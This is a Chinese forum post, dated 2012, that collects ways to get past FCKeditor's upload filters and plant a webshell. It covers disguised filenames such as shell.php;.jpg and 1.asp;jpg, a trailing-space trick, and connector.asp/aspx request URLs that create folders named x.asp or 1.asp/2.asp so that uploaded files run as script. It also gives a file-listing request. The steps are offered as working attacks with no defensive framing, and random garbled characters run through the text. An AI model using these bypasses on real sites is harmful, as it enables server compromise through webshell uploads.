很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg2 r! x% N- G: S0 G3 ?4 Z3 _
5 v. i6 t+ y! V) U4 P q+ t提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。, ^2 s, `/ a2 _
r3 m5 P2 \% P4 M0 [+ B7 M0 H
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
: C8 _. T; F# S7 }; n; F1 e/ ^* ^ A
突破建立文件夹:: G/ S2 L5 D" \' U) G5 v; x
, _; k7 u8 m4 `editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
* e& n! E9 @; w4 O" C& W
: q) P5 U; j# X# A( V1 y" h参数:
0 H: O/ r1 F2 `3 d; ?7 D( I$ D/ B- T& q, w, y: R
当前目录名:CurrentFolder=/qing.asp
; S v/ `* _! ~! C/ d0 x- k$ n1 S- K: f) U+ j) ]8 t0 B- H2 T
新的目录名:NewFolderName=x.asp
5 m; k) T- F5 k7 t- G7 V' T9 v; } j$ H, i! `
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
) n/ e$ T* d& D' N& h5 `
$ j* E/ N; W/ J1 u8 A8 M那么 x.asp 就已经建立生成了,此方法百试百灵!
$ k& @& I" j- Y: @9 G
2 S; _1 ]$ k6 J6 {" l3 O) d, `新建文件夹参数 x.asp,基本都能搞定。
6 C7 P i b% u/ P3 ~) e: F/ Z# A0 I% W! d+ [# S8 Z
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建! g$ x% H! H8 Y3 O: u$ t
' `, r1 S! s* U3 ]% N- d) m( _9 R
aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp
7 q8 t& T( K* Q3 F3 V. ^+ Y9 [% L* A7 y6 A, ?
获取文件列表
M8 K5 T, R. u3 r1 a+ D' d/ I aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F+ T7 @# _* P6 z/ b
' Z' t2 a! v5 }4 ^5 s K8 J4 u7 e
|
发表于 2012-12-31 09:27:09
收藏
支持
反对